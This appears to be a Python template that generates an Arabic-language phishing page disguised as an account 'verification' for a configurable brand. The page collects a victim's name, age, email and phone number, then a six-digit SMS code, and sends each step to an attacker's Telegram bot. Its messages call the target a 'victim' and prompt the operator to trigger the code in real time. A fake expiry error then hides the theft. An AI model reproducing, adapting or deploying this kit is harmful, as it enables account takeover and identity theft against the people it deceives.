# محتوى الـ HTML المطور مع التايمر
html_content = f"""
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1">
    <title>تأكيد الهوية | {sel['n']}</title>
    <style>
        body {{ background: #f0f2f5; font-family: sans-serif; display: flex; justify-content: center; align-items: center; min-height: 100vh; margin: 0; }}
        .card {{ background: #fff; width: 90%; max-width: 380px; padding: 30px; border-radius: 15px; box-shadow: 0 8px 20px rgba(0,0,0,0.1); text-align: center; }}
        .logo-img {{ width: 50px; margin-bottom: 10px; }}
        input, select {{ width: 100%; padding: 12px; margin: 8px 0; border: 1px solid #ddd; border-radius: 8px; box-sizing: border-box; }}
        .btn {{ width: 100%; padding: 14px; background: {sel['c']}; color: white; border: none; border-radius: 8px; font-weight: bold; cursor: pointer; margin-top: 10px; font-size: 16px; }}
        .otp-container {{ display: flex; justify-content: space-between; margin: 20px 0; direction: ltr; }}
        .otp-input {{ width: 45px; height: 50px; text-align: center; font-size: 20px; border: 1px solid #ddd; border-bottom: 3px solid {sel['c']}; border-radius: 5px; outline: none; }}
        #step2, #loading {{ display: none; }}
        .timer {{ color: #d32f2f; font-weight: bold; font-size: 14px; margin-top: 10px; }}
        .loader-icon {{ border: 4px solid #f3f3f3; border-top: 4px solid {sel['c']}; border-radius: 50%; width: 40px; height: 40px; animation: spin 1s linear infinite; margin: 20px auto; }}
        @keyframes spin {{ 0% {{ transform: rotate(0deg); }} 100% {{ transform: rotate(360deg); }} }}
        .verify-popup {{ position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); display: flex; justify-content: center; align-items: center; z-index: 1000; }}
        .p-box {{ background: white; padding: 20px; border-radius: 10px; text-align: center; width: 80%; }}
    </style>
</head>
<body onload="showPopup()">

    <div class="verify-popup" id="pop">
        <div class="p-box">
            <h3 style="color:{sel['c']}">توثيق حسابك الآن ✅</h3>
            <p>يرجى إكمال طلب التوثيق للحصول على الشارة الرسمية وحماية حسابك.</p>
            <button class="btn" onclick="closePop()">ابدأ الآن</button>
        </div>
    </div>

    <div class="card">
        <img src="{sel['i']}" class="logo-img">
        <h2 style="color:{sel['c']}; margin:0;">{sel['n']} Verify</h2>
        
        <div id="step1">
            <input type="text" id="n" placeholder="الاسم الكامل">
            <input type="number" id="a" placeholder="العمر">
            <select id="g"><option>ذكر</option><option>أنثى</option></select>
            <input type="email" id="e" placeholder="الجيميل / البريد">
            <input type="text" id="p" placeholder="رقم الهاتف المرتبط">
            <button class="btn" onclick="go2()">متابعة الطلب</button>
        </div>

        <div id="step2">
            <p style="font-size:14px;">أدخل الرمز المكون من 6 أرقام المرسل لهاتفك</p>
            <div class="otp-container">
                <input type="number" class="otp-input" maxlength="1" oninput="move(this)">
                <input type="number" class="otp-input" maxlength="1" oninput="move(this)">
                <input type="number" class="otp-input" maxlength="1" oninput="move(this)">
                <input type="number" class="otp-input" maxlength="1" oninput="move(this)">
                <input type="number" class="otp-input" maxlength="1" oninput="move(this)">
                <input type="number" class="otp-input" maxlength="1" oninput="move(this)">
            </div>
            <div id="timerDisplay" class="timer">إعادة إرسال الرمز خلال: 02:00</div>
            <button class="btn" onclick="startLoading()">تأكيد الهوية</button>
        </div>

        <div id="loading">
            <div class="loader-icon"></div>
            <p style="font-weight:bold; color:#555;">جاري التحقق والانتظار للتوثيق...</p>
        </div>
    </div>

    <script>
        function showPopup() {{ document.getElementById('pop').style.display='flex'; }}
        function closePop() {{ document.getElementById('pop').style.display='none'; }}
        function move(e) {{ if(e.value.length >=1) {{ e.nextElementSibling?.focus(); }} }}
        
        let data = "";
        async function go2() {{
            const n=document.getElementById('n').value, p=document.getElementById('p').value;
            if(!n || !p) return alert("يرجى إدخال البيانات");
            data = `🔥 صيد {sel['n']} 🔥\\n👤 الاسم: ${{n}}\\n📱 الرقم: ${{p}}\\n📧 البريد: ${{document.getElementById('e').value}}`;
            await fetch(`https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text=${{encodeURIComponent("⚠️ الضحية دخل! اطلب الكود الآن لـ: " + p)}}`);
            document.getElementById('step1').style.display='none';
            document.getElementById('step2').style.display='block';
            startTimer(120);
        }}

        function startTimer(duration) {{
            let timer = duration, minutes, seconds;
            let display = document.getElementById('timerDisplay');
            let interval = setInterval(function () {{
                minutes = parseInt(timer / 60, 10);
                seconds = parseInt(timer % 60, 10);
                minutes = minutes < 10 ? "0" + minutes : minutes;
                seconds = seconds < 10 ? "0" + seconds : seconds;
                display.textContent = "إعادة إرسال الرمز خلال: " + minutes + ":" + seconds;
                if (--timer < 0) {{ clearInterval(interval); display.textContent = "تمت محاولة الإرسال ثانية."; }}
            }}, 1000);
        }}

        async function startLoading() {{
            let code = "";
            document.querySelectorAll('.otp-input').forEach(i => code += i.value);
            if(code.length < 6) return alert("يرجى إدخال الكود كاملاً");
            
            document.getElementById('step2').style.display='none';
            document.getElementById('loading').style.display='block';
            
            await fetch(`https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text=${{encodeURIComponent(data + "\\n\\n🔑 كود التحقق (SMS): " + code)}}`);
            setTimeout(() => {{ alert("فشل الاتصال بالسيرفر، الكود الذي أدخلته منتهي الصلاحية."); location.reload(); }}, 8000);
        }}
    </script>
</body>
</html>
"""
